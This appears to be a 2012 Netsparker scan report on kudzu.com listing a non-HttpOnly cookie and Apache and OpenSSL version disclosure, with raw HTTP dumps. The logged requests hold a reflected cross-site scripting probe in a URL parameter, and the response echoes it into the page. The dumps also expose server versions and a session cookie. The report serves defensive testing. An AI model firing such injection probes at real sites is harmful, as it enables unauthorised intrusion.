</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>







<!--content table-->

<div class="pageHead">
<h1></h1>
</div>
<div class="pagePadding pageSpacing" style="padding-bottom:20px">
<table border="0" cellpadding="0" cellspacing="0">




<table border="0" cellpadding="0" cellspacing="0" class="topSpacing errorPage" width="1000">
<tr>
<td valign="top" style="padding:20px 30px">
<table cellpadding="0" cellspacing="0" width="500">
<tr>
<td valign="top"><span class="form_textheader errorHeading">We're Sorry</span></td>
</tr>
<tr>
<td valign="top" height="15"></td>
</tr>
<tr>
<td valign="top">Kudzu.com doesn't understand your search request. Our team tries hard to maintain a perfect site but sometimes problems occur. A Kudzu.com site administrator has been notified of this error so we can fix the problem.<br />
<br />
We want to help you easily find what you're looking for. Please <a href="/browse.do">click here</a> to browse the categories on our site or go to the <a href="/">Kudzu.com home page</a> to start another keyword search.
</td>
</tr>
<tr>
<td valign="top">&nbsp;</td>
</tr>
<tr>
<td valign="top">&nbsp;</td>
</tr>
<tr>
<td align="left" valign="top">We appreciate your patience as we work to make Kudzu.com better.</td>
</tr>
<tr>
<td valign="top">&nbsp;</td>
</tr>
</table>
</td>
<td width="15">
<br />
</td>
<td align="left" valign="top" width="170">




<table cellpadding="0" cellspacing="0" width="160" class="noPrint" border="0">
<tr>
<td style="text-align:left">

<!-- No image available for request!!! Is bucket turned on for the market?-->






</td>
</tr>



<tr>

<td valign="top" align="center">
<iframe id="kadr160x600" src="/DoubleClickFrame.jsp?adType=TOWER_AD&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="160" height="600" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>

<tr>
<td align="center" valign="top">


</td>
</tr>

</table>

</td>
</tr>
</table>
<script>var s_account="coxsearchkudzuprod"</script><script language="JavaScript" src="/javascript/s_code.js"></script><script language="JavaScript"><!-- s.pageName="error : 500" s.server="10.213.166.131" s.channel="newyorkcity"
s.pageType="errorPage"
s.events="event1"s.prop6="new york" s.eVar6="New York" s.prop5="ny" s.eVar2="NY" s.eVar4="10012" var s_code=s.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') // --></script><!--/DO NOT REMOVE/-->






</table>
</div>




<!-- google_ad_section_start(weight=ignore) -->
<center>
<table cellpadding="0" cellspacing="0" border="0" width="960" class="footerTable">
<tr>
<td align="center">
<div class="smalltext"><br />





<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>

<td alig..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /controller.jsp

/controller.jsp CONFIRMED

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Identified Cookie

logs

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:25:36 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: logs=174.36.218.2.1326979536100593; path=/; expires=Sun, 14-Jul-24 13:25:36 GMT,JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; Path=/,locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=16.093470878864444">

<center>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /controller.jsp

/controller.jsp

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Extracted Version

2.0.63

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:25:36 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: logs=174.36.218.2.1326979536100593; path=/; expires=Sun, 14-Jul-24 13:25:36 GMT,JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; Path=/,locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=16.093470878864444">

..
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /controller.jsp

/controller.jsp

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Extracted Version

OpenSSL/0.9.8e

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:25:36 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
